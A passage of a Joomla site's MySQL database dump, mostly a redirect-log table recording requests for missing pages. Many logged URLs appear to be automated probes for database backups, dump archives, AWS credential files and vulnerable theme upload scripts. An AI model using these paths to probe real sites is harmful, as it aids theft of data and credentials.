01:40:36','0000-00-00 00:00:00',301),(24716,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.tar',NULL,'','',4,0,'2022-09-18 01:58:47','0000-00-00 00:00:00',301),(24717,'https://ekvatorprint.com.ua/ekvatorprint.com.uabackup.tar',NULL,'','',4,0,'2022-09-18 02:13:45','0000-00-00 00:00:00',301),(24718,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.tar',NULL,'','',4,0,'2022-09-18 02:41:06','0000-00-00 00:00:00',301),(24719,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.tar',NULL,'','',4,0,'2022-09-18 03:00:54','0000-00-00 00:00:00',301),(24720,'https://ekvatorprint.com.ua/backupekvatorprint.com.ua.tar',NULL,'','',4,0,'2022-09-18 03:08:33','0000-00-00 00:00:00',301),(24721,'https://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.tar',NULL,'','',4,0,'2022-09-18 03:35:46','0000-00-00 00:00:00',301),(24722,'https://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.tar',NULL,'','',4,0,'2022-09-18 04:41:34','0000-00-00 00:00:00',301),(24723,'https://ekvatorprint.com.ua/ekvatorprintdb.tar',NULL,'','',5,0,'2022-09-18 04:52:57','0000-00-00 00:00:00',301),(24724,'https://ekvatorprint.com.ua/ekvatorprint_db.tar',NULL,'','',5,0,'2022-09-18 05:24:36','0000-00-00 00:00:00',301),(24725,'https://ekvatorprint.com.ua/ekvatorprint-db.tar',NULL,'','',5,0,'2022-09-18 05:35:27','0000-00-00 00:00:00',301),(24726,'https://ekvatorprint.com.ua/ekvatorprint-database.tar',NULL,'','',4,0,'2022-09-18 07:47:49','0000-00-00 00:00:00',301),(24727,'https://ekvatorprint.com.ua/ekvatorprint_dump.tar',NULL,'','',5,0,'2022-09-18 08:00:37','0000-00-00 00:00:00',301),(24728,'https://ekvatorprint.com.ua/ekvatorprint-dump.tar',NULL,'','',5,0,'2022-09-18 08:29:16','0000-00-00 00:00:00',301),(24729,'https://ekvatorprint.com.ua/ekvatorprintbackup.tar',NULL,'','',5,0,'2022-09-18 09:01:18','0000-00-00 00:00:00',301),(24730,'https://ekvatorprint.com.ua/ekvatorprint-backup.tar',NULL,'','',5,0,'2022-09-18 10:29:56','0000-00-00 00:00:00',301),(24731,'https://ekvatorprint.com.ua/backupekvatorprint.tar',NULL,'','',5,0,'2022-09-18 11:01:04','0000-00-00 00:00:00',301),(24732,'https://ekvatorprint.com.ua/backup-ekvatorprint.tar',NULL,'','',5,0,'2022-09-18 11:45:58','0000-00-00 00:00:00',301),(24733,'https://ekvatorprint.com.ua/backup_ekvatorprint.tar',NULL,'','',5,0,'2022-09-18 12:13:05','0000-00-00 00:00:00',301),(24734,'https://ekvatorprint.com.ua/dbdump.7z',NULL,'','',4,0,'2022-09-18 13:49:37','0000-00-00 00:00:00',301),(24735,'https://ekvatorprint.com.ua/wp-content/themes/optimizepress/lib/admin/media-upload.php',NULL,'','',1,0,'2022-09-18 15:42:15','0000-00-00 00:00:00',301),(24736,'https://ekvatorprint.com.ua/localhost.7z',NULL,'','',5,0,'2022-09-18 15:57:55','0000-00-00 00:00:00',301),(24737,'https://ekvatorprint.com.ua/localhostdb.7z',NULL,'','',5,0,'2022-09-18 16:43:57','0000-00-00 00:00:00',301),(24738,'https://ekvatorprint.com.ua/localhost_db.7z',NULL,'','',4,0,'2022-09-18 18:51:17','0000-00-00 00:00:00',301),(24739,'https://ekvatorprint.com.ua/localhost-db.7z',NULL,'','',4,0,'2022-09-18 19:33:22','0000-00-00 00:00:00',301),(24740,'https://ekvatorprint.com.ua/localhost_database.7z',NULL,'','',4,0,'2022-09-18 20:01:52','0000-00-00 00:00:00',301),(24741,'https://ekvatorprint.com.ua/localhost-database.7z',NULL,'','',4,0,'2022-09-18 21:04:31','0000-00-00 00:00:00',301),(24742,'https://ekvatorprint.com.ua/wp-includes/js/quicktags.js',NULL,'','',1,0,'2022-09-18 21:27:14','0000-00-00 00:00:00',301),(24743,'https://ekvatorprint.com.ua/localhost_dump.7z',NULL,'','',4,0,'2022-09-18 21:43:47','0000-00-00 00:00:00',301),(24744,'https://ekvatorprint.com.ua/localhost-dump.7z',NULL,'','',4,0,'2022-09-18 22:49:13','0000-00-00 00:00:00',301),(24745,'https://ekvatorprint.com.ua/localhostbackup.7z',NULL,'','',4,0,'2022-09-18 23:50:40','0000-00-00 00:00:00',301),(24746,'https://ekvatorprint.com.ua/localhost_backup.7z',NULL,'','',5,0,'2022-09-19 00:42:41','0000-00-00 00:00:00',301),(24747,'https://ekvatorprint.com.ua/localhost-backup.7z',NULL,'','',5,0,'2022-09-19 00:47:53','0000-00-00 00:00:00',301),(24748,'https://ekvatorprint.com.ua/backuplocalhost.7z',NULL,'','',5,0,'2022-09-19 01:22:22','0000-00-00 00:00:00',301),(24749,'https://ekvatorprint.com.ua/backup-localhost.7z',NULL,'','',5,0,'2022-09-19 02:48:47','0000-00-00 00:00:00',301),(24750,'https://ekvatorprint.com.ua/backup_localhost.7z',NULL,'','',5,0,'2022-09-19 03:55:32','0000-00-00 00:00:00',301),(24751,'https://ekvatorprint.com.ua/ekvatorprintdb.7z',NULL,'','',5,0,'2022-09-19 04:56:48','0000-00-00 00:00:00',301),(24752,'https://ekvatorprint.com.ua/ekvatorprint-db.7z',NULL,'','',2,0,'2022-09-19 05:29:22','0000-00-00 00:00:00',301),(24753,'https://ekvatorprint.com.ua/adminisatrtor',NULL,'','',1,0,'2022-09-19 05:58:43','0000-00-00 00:00:00',301),(24754,'https://ekvatorprint.com.ua/ekvatorprint-database.7z',NULL,'','',2,0,'2022-09-19 06:23:38','0000-00-00 00:00:00',301),(24755,'https://ekvatorprint.com.ua/ekvatorprint_dump.7z',NULL,'','',2,0,'2022-09-19 06:46:28','0000-00-00 00:00:00',301),(24756,'https://ekvatorprint.com.ua/ekvatorprint-dump.7z',NULL,'','',2,0,'2022-09-19 07:18:19','0000-00-00 00:00:00',301),(24757,'https://ekvatorprint.com.ua/ekvatorprintbackup.7z',NULL,'','',2,0,'2022-09-19 08:46:39','0000-00-00 00:00:00',301),(24758,'https://ekvatorprint.com.ua/ekvatorprint-backup.7z',NULL,'','',3,0,'2022-09-19 10:33:38','0000-00-00 00:00:00',301),(24759,'https://ekvatorprint.com.ua/backupekvatorprint.7z',NULL,'','',3,0,'2022-09-19 11:07:08','0000-00-00 00:00:00',301),(24760,'https://ekvatorprint.com.ua/backup-ekvatorprint.7z',NULL,'','',2,0,'2022-09-19 11:52:42','0000-00-00 00:00:00',301),(24761,'https://ekvatorprint.com.ua/backup_ekvatorprint.7z',NULL,'','',2,0,'2022-09-19 12:13:02','0000-00-00 00:00:00',301),(24762,'https://ekvatorprint.com.ua/ekvatorprint.com.uadb.7z',NULL,'','',3,0,'2022-09-19 13:44:40','0000-00-00 00:00:00',301),(24763,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_db.7z',NULL,'','',3,0,'2022-09-19 14:28:12','0000-00-00 00:00:00',301),(24764,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-db.7z',NULL,'','',4,0,'2022-09-19 14:56:29','0000-00-00 00:00:00',301),(24765,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_database.7z',NULL,'','',4,0,'2022-09-19 16:51:58','0000-00-00 00:00:00',301),(24766,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-database.7z',NULL,'','',3,0,'2022-09-19 17:17:53','0000-00-00 00:00:00',301),(24767,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.7z',NULL,'','',4,0,'2022-09-19 17:58:40','0000-00-00 00:00:00',301),(24768,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.7z',NULL,'','',4,0,'2022-09-19 19:22:59','0000-00-00 00:00:00',301),(24769,'https://ekvatorprint.com.ua/ekvatorprint.com.uabackup.7z',NULL,'','',5,0,'2022-09-19 20:06:04','0000-00-00 00:00:00',301),(24770,'https://ekvatorprint.com.ua/a9yz7wzwb1t',NULL,'','',1,0,'2022-09-19 21:18:22','0000-00-00 00:00:00',301),(24771,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.7z',NULL,'','',5,0,'2022-09-19 21:58:26','0000-00-00 00:00:00',301),(24772,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.7z',NULL,'','',7,0,'2022-09-19 22:06:22','0000-00-00 00:00:00',301),(24773,'https://ekvatorprint.com.ua/obajuwfvz1bc',NULL,'','',1,0,'2022-09-19 22:06:59','0000-00-00 00:00:00',301),(24774,'https://ekvatorprint.com.ua/backupekvatorprint.com.ua.7z',NULL,'','',7,0,'2022-09-19 22:25:35','0000-00-00 00:00:00',301),(24775,'https://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.7z',NULL,'','',6,0,'2022-09-19 22:55:51','0000-00-00 00:00:00',301),(24776,'https://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.7z',NULL,'','',6,0,'2022-09-20 00:15:59','0000-00-00 00:00:00',301),(24777,'https://ekvatorprint.com.ua/dbdump.rar',NULL,'','',6,0,'2022-09-20 02:33:43','0000-00-00 00:00:00',301),(24778,'https://ekvatorprint.com.ua/wp-content/themes/konzept/includes/uploadify/upload.php',NULL,'','',1,0,'2022-09-20 03:45:46','0000-00-00 00:00:00',301),(24779,'https://ekvatorprint.com.ua/localhost.rar',NULL,'','',6,0,'2022-09-20 03:48:45','0000-00-00 00:00:00',301),(24780,'https://ekvatorprint.com.ua/localhostdb.rar',NULL,'','',6,0,'2022-09-20 04:34:34','0000-00-00 00:00:00',301),(24781,'https://ekvatorprint.com.ua/localhost_db.rar',NULL,'','',6,0,'2022-09-20 05:13:26','0000-00-00 00:00:00',301),(24782,'https://ekvatorprint.com.ua/localhost-db.rar',NULL,'','',5,0,'2022-09-20 05:33:34','0000-00-00 00:00:00',301),(24783,'https://ekvatorprint.com.ua/localhost_database.rar',NULL,'','',6,0,'2022-09-20 06:21:32','0000-00-00 00:00:00',301),(24784,'https://ekvatorprint.com.ua/localhost-database.rar',NULL,'','',7,0,'2022-09-20 06:45:31','0000-00-00 00:00:00',301),(24785,'https://ekvatorprint.com.ua/localhost_dump.rar',NULL,'','',7,0,'2022-09-20 07:03:16','0000-00-00 00:00:00',301),(24786,'https://ekvatorprint.com.ua/localhost-dump.rar',NULL,'','',7,0,'2022-09-20 07:16:08','0000-00-00 00:00:00',301),(24787,'https://ekvatorprint.com.ua/localhostbackup.rar',NULL,'','',6,0,'2022-09-20 07:37:01','0000-00-00 00:00:00',301),(24788,'https://ekvatorprint.com.ua/localhost_backup.rar',NULL,'','',6,0,'2022-09-20 08:26:38','0000-00-00 00:00:00',301),(24789,'https://ekvatorprint.com.ua/localhost-backup.rar',NULL,'','',6,0,'2022-09-20 09:13:33','0000-00-00 00:00:00',301),(24790,'https://ekvatorprint.com.ua/backuplocalhost.rar',NULL,'','',6,0,'2022-09-20 09:49:01','0000-00-00 00:00:00',301),(24791,'https://ekvatorprint.com.ua/backup-localhost.rar',NULL,'','',7,0,'2022-09-20 09:56:46','0000-00-00 00:00:00',301),(24792,'https://ekvatorprint.com.ua/backup_localhost.rar',NULL,'','',7,0,'2022-09-20 10:14:45','0000-00-00 00:00:00',301),(24793,'https://ekvatorprint.com.ua/ekvatorprint.com.uadb.rar',NULL,'','',7,0,'2022-09-20 11:31:24','0000-00-00 00:00:00',301),(24794,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_db.rar',NULL,'','',7,0,'2022-09-20 12:04:35','0000-00-00 00:00:00',301),(24795,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-db.rar',NULL,'','',7,0,'2022-09-20 12:31:02','0000-00-00 00:00:00',301),(24796,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_database.rar',NULL,'','',7,0,'2022-09-20 12:41:13','0000-00-00 00:00:00',301),(24797,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-database.rar',NULL,'','',6,0,'2022-09-20 14:05:39','0000-00-00 00:00:00',301),(24798,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.rar',NULL,'','',5,0,'2022-09-20 15:05:54','0000-00-00 00:00:00',301),(24799,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.rar',NULL,'','',6,0,'2022-09-20 16:16:44','0000-00-00 00:00:00',301),(24800,'https://ekvatorprint.com.ua/ekvatorprint.com.uabackup.rar',NULL,'','',6,0,'2022-09-20 16:24:09','0000-00-00 00:00:00',301),(24801,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.rar',NULL,'','',6,0,'2022-09-20 16:35:46','0000-00-00 00:00:00',301),(24802,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.rar',NULL,'','',7,0,'2022-09-20 16:43:12','0000-00-00 00:00:00',301),(24803,'https://ekvatorprint.com.ua/backupekvatorprint.com.ua.rar',NULL,'','',8,0,'2022-09-20 17:31:06','0000-00-00 00:00:00',301),(24804,'https://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.rar',NULL,'','',8,0,'2022-09-20 18:00:11','0000-00-00 00:00:00',301),(24805,'https://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.rar',NULL,'','',8,0,'2022-09-20 18:28:24','0000-00-00 00:00:00',301),(24806,'https://ekvatorprint.com.ua/ekvatorprintdb.rar',NULL,'','',8,0,'2022-09-20 18:34:03','0000-00-00 00:00:00',301),(24807,'https://ekvatorprint.com.ua/ekvatorprint-db.rar',NULL,'','',8,0,'2022-09-20 19:32:58','0000-00-00 00:00:00',301),(24808,'https://ekvatorprint.com.ua/ekvatorprint-database.rar',NULL,'','',5,0,'2022-09-20 21:09:31','0000-00-00 00:00:00',301),(24809,'https://ekvatorprint.com.ua/ekvatorprint_dump.rar',NULL,'','',4,0,'2022-09-20 22:19:20','0000-00-00 00:00:00',301),(24810,'https://ekvatorprint.com.ua/ekvatorprint-dump.rar',NULL,'','',3,0,'2022-09-20 22:50:43','0000-00-00 00:00:00',301),(24811,'https://ekvatorprint.com.ua/ekvatorprintbackup.rar',NULL,'','',3,0,'2022-09-20 23:43:09','0000-00-00 00:00:00',301),(24812,'https://ekvatorprint.com.ua/ekvatorprint-backup.rar',NULL,'','',3,0,'2022-09-21 00:35:11','0000-00-00 00:00:00',301),(24813,'https://ekvatorprint.com.ua/backupekvatorprint.rar',NULL,'','',4,0,'2022-09-21 02:19:43','0000-00-00 00:00:00',301),(24814,'https://ekvatorprint.com.ua/backup-ekvatorprint.rar',NULL,'','',3,0,'2022-09-21 03:41:52','0000-00-00 00:00:00',301),(24815,'https://ekvatorprint.com.ua/backup_ekvatorprint.rar',NULL,'','',3,0,'2022-09-21 04:22:50','0000-00-00 00:00:00',301),(24816,'https://ekvatorprint.com.ua/db/db_backup.ekvatorprint.com.ua.sql.gz',NULL,'','',3,0,'2022-09-21 05:38:22','0000-00-00 00:00:00',301),(24817,'https://ekvatorprint.com.ua/db/db_backup.ekvatorprint.sql.gz',NULL,'','',3,0,'2022-09-21 06:26:53','0000-00-00 00:00:00',301),(24818,'https://ekvatorprint.com.ua/db/db_backup.sql.gz',NULL,'','',3,0,'2022-09-21 07:02:02','0000-00-00 00:00:00',301),(24819,'https://ekvatorprint.com.ua/db/db_backup.ekvatorprint.com.ua.sql',NULL,'','',3,0,'2022-09-21 07:36:32','0000-00-00 00:00:00',301),(24820,'https://ekvatorprint.com.ua/db/db_backup.ekvatorprint.sql',NULL,'','',3,0,'2022-09-21 07:53:42','0000-00-00 00:00:00',301),(24821,'https://ekvatorprint.com.ua/db/dump.sql',NULL,'','',7,0,'2022-09-21 08:02:08','0000-00-00 00:00:00',301),(24822,'https://ekvatorprint.com.ua/db/backup.sql',NULL,'','',4,0,'2022-09-21 08:32:46','0000-00-00 00:00:00',301),(24823,'https://ekvatorprint.com.ua/db/backup.sql.zip',NULL,'','',4,0,'2022-09-21 09:20:14','0000-00-00 00:00:00',301),(24824,'https://ekvatorprint.com.ua/db/_db_.sql',NULL,'','',8,0,'2022-09-21 09:48:07','0000-00-00 00:00:00',301),(24825,'https://ekvatorprint.com.ua/db/_db_.sql.zip',NULL,'','',4,0,'2022-09-21 11:42:56','0000-00-00 00:00:00',301),(24826,'https://ekvatorprint.com.ua/db/_db_.tar.gz',NULL,'','',4,0,'2022-09-21 12:19:50','0000-00-00 00:00:00',301),(24827,'https://ekvatorprint.com.ua/wp-content/themes/konzept/style.css',NULL,'','',1,0,'2022-09-21 12:54:49','0000-00-00 00:00:00',301),(24828,'https://ekvatorprint.com.ua/db/sql.txt',NULL,'','',6,0,'2022-09-21 13:16:55','0000-00-00 00:00:00',301),(24829,'https://ekvatorprint.com.ua/db/database.sql',NULL,'','',6,0,'2022-09-21 13:59:44','0000-00-00 00:00:00',301),(24830,'https://ekvatorprint.com.ua/db/sql.sql',NULL,'','',8,0,'2022-09-21 15:21:10','0000-00-00 00:00:00',301),(24831,'https://ekvatorprint.com.ua/db/bak.sql',NULL,'','',7,0,'2022-09-21 16:48:43','0000-00-00 00:00:00',301),(24832,'https://ekvatorprint.com.ua/db/bck.sql',NULL,'','',6,0,'2022-09-21 17:57:57','0000-00-00 00:00:00',301),(24833,'https://ekvatorprint.com.ua/db/ekvatorprint.com.ua.bak.sql',NULL,'','',5,0,'2022-09-21 19:03:16','0000-00-00 00:00:00',301),(24834,'https://ekvatorprint.com.ua/db/ekvatorprint.com.ua.bck.sql',NULL,'','',5,0,'2022-09-21 19:57:53','0000-00-00 00:00:00',301),(24835,'https://ekvatorprint.com.ua/db/ekvatorprint.bak.sql',NULL,'','',5,0,'2022-09-21 20:31:32','0000-00-00 00:00:00',301),(24836,'https://ekvatorprint.com.ua/db/ekvatorprint.bck.sql',NULL,'','',7,0,'2022-09-21 21:16:36','0000-00-00 00:00:00',301),(24837,'https://ekvatorprint.com.ua/db/data.sql',NULL,'','',8,0,'2022-09-21 21:24:57','0000-00-00 00:00:00',301),(24838,'https://ekvatorprint.com.ua/db/dump.sql.gz',NULL,'','',7,0,'2022-09-21 23:26:41','0000-00-00 00:00:00',301),(24839,'https://ekvatorprint.com.ua/.awscredentials',NULL,'','',1,0,'2022-09-21 23:35:54','0000-00-00 00:00:00',301),(24840,'https://ekvatorprint.com.ua/db/dump.sql.tgz',NULL,'','',6,0,'2022-09-22 00:49:20','0000-00-00 00:00:00',301),(24841,'https://ekvatorprint.com.ua/db/dump.sql.bck',NULL,'','',5,0,'2022-09-22 01:32:12','0000-00-00 00:00:00',301),(24842,'https://ekvatorprint.com.ua/db/www.ekvatorprint.com.ua.sql',NULL,'','',5,0,'2022-09-22 02:36:52','0000-00-00 00:00:00',301),(24843,'https://ekvatorprint.com.ua/db/www.ekvatorprint.com.ua.sql.gz',NULL,'','',3,0,'2022-09-22 03:05:27','0000-00-00 00:00:00',301),(24844,'https://ekvatorprint.com.ua/db/www.ekvatorprint.sql',NULL,'','',3,0,'2022-09-22 04:16:10','0000-00-00 00:00:00',301),(24845,'https://ekvatorprint.com.ua/db/www.ekvatorprint.sql.gz',NULL,'','',3,0,'2022-09-22 05:32:39','0000-00-00 00:00:00',301),(24846,'https://ekvatorprint.com.ua/db/ekvatorprint.com.ua.sql',NULL,'','',3,0,'2022-09-22 06:20:59','0000-00-00 00:00:00',301),(24847,'https://ekvatorprint.com.ua/db/ekvatorprint.com.ua.sql.gz',NULL,'','',2,0,'2022-09-22 07:14:02','0000-00-00 00:00:00',301),(24848,'https://ekvatorprint.com.ua/db/ekvatorprint.sql',NULL,'','',2,0,'2022-09-22 07:26:52','0000-00-00 00:00:00',301),(24849,'https://ekvatorprint.com.ua/db/ekvatorprint_backup.sql',NULL,'','',2,0,'2022-09-22 08:24:00','0000-00-00 00:00:00',301),(24850,'https://ekvatorprint.com.ua/db/ekvatorprint_backup.sql.gz',NULL,'','',2,0,'2022-09-22 09:32:34','0000-00-00 00:00:00',301),(24851,'https://ekvatorprint.com.ua/db/ekvatorprint.com.ua_mysql.sql',NULL,'','',2,0,'2022-09-22 10:24:09','0000-00-00 00:00:00',301),(24852,'https://ekvatorprint.com.ua/db/ekvatorprint_mysql.sql',NULL,'','',3,0,'2022-09-22 10:32:51','0000-00-00 00:00:00',301),(24853,'https://ekvatorprint.com.ua/db/databases.sql',NULL,'','',4,0,'2022-09-22 10:51:43','0000-00-00 00:00:00',301),(24854,'https://ekvatorprint.com.ua/db/databases.zip',NULL,'','',4,0,'2022-09-22 11:46:01','0000-00-00 00:00:00',301),(24855,'https://ekvatorprint.com.ua/db/databases.tar',NULL,'','',4,0,'2022-09-22 12:06:49','0000-00-00 00:00:00',301),(24856,'https://ekvatorprint.com.ua/db/databases.tar.gz',NULL,'','',5,0,'2022-09-22 12:42:05','0000-00-00 00:00:00',301),(24857,'https://ekvatorprint.com.ua/db/databases.bck',NULL,'','',6,0,'2022-09-22 14:18:28','0000-00-00 00:00:00',301),(24858,'https://ekvatorprint.com.ua/db/databases.tgz',NULL,'','',3,0,'2022-09-22 14:34:11','0000-00-00 00:00:00',301),(24859,'https://ekvatorprint.com.ua/db/db.php~',NULL,'','',6,0,'2022-09-22 15:23:14','0000-00-00 00:00:00',301),(24860,'https://ekvatorprint.com.ua/aws.credentials',NULL,'','',1,0,'2022-09-22 15:24:49','0000-00-00 00:00:00',301),(24861,'https://ekvatorprint.com.ua/db/db.bak',NULL,'','',7,0,'2022-09-22 15:56:16','0000-00-00 00:00:00',301),(24862,'https://ekvatorprint.com.ua/db/db.php.bck',NULL,'','',6,0,'2022-09-22 16:10:28','0000-00-00 00:00:00',301),(24863,'https://ekvatorprint.com.ua/db/db.php.bak',NULL,'','',6,0,'2022-09-22 16:54:54','0000-00-00 00:00:00',301),(24864,'https://ekvatorprint.com.ua/db/database.php~',NULL,'','',7,0,'2022-09-22 18:07:10','0000-00-00 00:00:00',301),(24865,'https://ekvatorprint.com.ua/db/database.bak',NULL,'','',6,0,'2022-09-22 18:43:13','0000-00-00 00:00:00',301),(24866,'https://ekvatorprint.com.ua/db/database.php.bak',NULL,'','',6,0,'2022-09-22 19:13:45','0000-00-00 00:00:00',301),(24867,'https://ekvatorprint.com.ua/db/database.php.bck',NULL,'','',6,0,'2022-09-22 19:47:14','0000-00-00 00:00:00',301),(24868,'https://ekvatorprint.com.ua/db/db.gz',NULL,'','',6,0,'2022-09-22 20:21:57','0000-00-00 00:00:00',301),(24869,'https://ekvatorprint.com.ua/db/db.rar',NULL,'','',5,0,'2022-09-22 20:40:11','0000-00-00 00:00:00',301),(24870,'https://ekvatorprint.com.ua/db/db.zip',NULL,'','',3,0,'2022-09-22 21:22:50','0000-00-00 00:00:00',301),(24871,'https://ekvatorprint.com.ua/db/db.bz2',NULL,'','',3,0,'2022-09-22 22:03:56','0000-00-00 00:00:00',301),(24872,'https://ekvatorprint.com.ua/db/db.tgz',NULL,'','',3,0,'2022-09-22 22:30:59','0000-00-00 00:00:00',301),(24873,'https://ekvatorprint.com.ua/db/db.bck',NULL,'','',3,0,'2022-09-22 23:20:41','0000-00-00 00:00:00',301),(24874,'https://ekvatorprint.com.ua/db/database.gz',NULL,'','',3,0,'2022-09-22 23:38:56','0000-00-00 00:00:00',301),(24875,'https://ekvatorprint.com.ua/db/database.bz2',NULL,'','',3,0,'2022-09-22 23:55:07','0000-00-00 00:00:00',301),(24876,'https://ekvatorprint.com.ua/db/database.tgz',NULL,'','',2,0,'2022-09-23 00:24:58','0000-00-00 00:00:00',301),(24877,'https://ekvatorprint.com.ua/db/database.bck',NULL,'','',3,0,'2022-09-23 01:12:22','0000-00-00 00:00:00',301),(24878,'https://ekvatorprint.com.ua/db/db.sql',NULL,'','',3,0,'2022-09-23 01:41:16','0000-00-00 00:00:00',301),(24879,'https://ekvatorprint.com.ua/db/dbdump.sql',NULL,'','',3,0,'2022-09-23 02:39:27','0000-00-00 00:00:00',301),(24880,'https://ekvatorprint.com.ua/db/localhost.sql',NULL,'','',2,0,'2022-09-23 03:10:30','0000-00-00 00:00:00',301),(24881,'https://ekvatorprint.com.ua/db/localhostdb.sql',NULL,'','',2,0,'2022-09-23 03:35:09','0000-00-00 00:00:00',301),(24882,'https://ekvatorprint.com.ua/wp-content/themes/qualifire/style.css',NULL,'','',1,0,'2022-09-23 03:47:01','0000-00-00 00:00:00',301),(24883,'https://ekvatorprint.com.ua/db/localhost_db.sql',NULL,'','',3,0,'2022-09-23 04:00:13','0000-00-00 00:00:00',301),(24884,'https://ekvatorprint.com.ua/db/localhost-db.sql',NULL,'','',2,0,'2022-09-23 04:46:09','0000-00-00 00:00:00',301),(24885,'https://ekvatorprint.com.ua/db/localhost_database.sql',NULL,'','',3,0,'2022-09-23 05:52:20','0000-00-00 00:00:00',301),(24886,'https://ekvatorprint.com.ua/db/localhost-database.sql',NULL,'','',3,0,'2022-09-23 06:22:00','0000-00-00 00:00:00',301);
/*!40000 ALTER TABLE `j25_redirect_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_schemas`
--

DROP TABLE IF EXISTS `j25_schemas`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_schemas` (
  `extension_id` int(11) NOT NULL,
  `version_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`extension_id`,`version_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_schemas`
--

LOCK TABLES `j25_schemas` WRITE;
/*!40000 ALTER TABLE `j25_schemas` DISABLE KEYS */;
INSERT INTO `j25_schemas` VALUES (21,'3.5.1'),(700,'3.10.7-2022-03-18'),(10049,'2.8.2');
/*!40000 ALTER TABLE `j25_schemas` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_securitycheck`
--

DROP TABLE IF EXISTS `j25_securitycheck`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_securitycheck` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `Product` varchar(35) NOT NULL,
  `Type` varchar(35) DEFAULT NULL,
  `Installedversion` varchar(30) DEFAULT '---',
  `Vulnerable` varchar(10) NOT NULL DEFAULT 'No',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=38 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_securitycheck`
--

LOCK TABLES `j25_securitycheck` WRITE;
/*!40000 ALTER TABLE `j25_securitycheck` DISABLE KEYS */;
INSERT INTO `j25_securitycheck` VALUES (1,'Joomla!','core','3.4.5','No'),(2,'com_admin','component','3.0.0','No'),(3,'com_admintools','component','3.6.5','No'),(4,'com_ajax','component','3.2.0','No'),(5,'com_akeeba','component','4.4.3','No'),(6,'com_banners','component','3.0.0','No'),(7,'com_cache','component','3.0.0','No'),(8,'com_categories','component','3.0.0','No'),(9,'com_checkin','component','3.0.0','No'),(10,'com_config','component','3.0.0','No'),(11,'com_contact','component','3.0.0','No'),(12,'com_content','component','3.0.0','No'),(13,'com_contenthistory','component','3.2.0','No'),(14,'com_cpanel','component','3.0.0','No'),(15,'com_finder','component','','No'),(16,'com_installer','component','3.0.0','No'),(17,'com_joomlaupdate','component','2.5.0','No'),(18,'com_languages','component','3.0.0','No'),(19,'com_login','component','3.0.0','No'),(20,'com_mailto','component','3.0.0','No'),(21,'com_media','component','3.0.0','No'),(22,'com_menus','component','3.0.0','No'),(23,'com_messages','component','3.0.0','No'),(24,'com_modules','component','3.0.0','No'),(25,'com_newsfeeds','component','3.0.0','No'),(26,'com_phocagallery','component','4.2.1','No'),(27,'com_plugins','component','3.0.0','No'),(28,'com_postinstall','component','3.2.0','No'),(29,'com_redirect','component','3.0.0','No'),(30,'com_search','component','3.0.0','No'),(31,'com_securitycheck','component','2.8.2','No'),(32,'com_tags','component','3.1.0','No'),(33,'com_templates','component','3.0.0','No'),(34,'com_users','component','3.0.0','No'),(35,'com_weblinks','component','2.5.0','No'),(36,'com_wrapper','component','3.0.0','No'),(37,'com_xmap','component','','No');
/*!40000 ALTER TABLE `j25_securitycheck` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_securitycheck_db`
--

DROP TABLE IF EXISTS `j25_securitycheck_db`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_securitycheck_db` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `Product` varchar(35) NOT NULL,
  `Type` varchar(35) DEFAULT NULL,
  `Vulnerableversion` varchar(10) DEFAULT '---',
  `modvulnversion` varchar(2) DEFAULT '==',
  `Joomlaversion` varchar(30) DEFAULT 'Notdefined',
  `modvulnjoomla` varchar(20) DEFAULT '==',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=64 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_securitycheck_db`
--

LOCK TABLES `j25_securitycheck_db` WRITE;
/*!40000 ALTER TABLE `j25_securitycheck_db` DISABLE KEYS */;
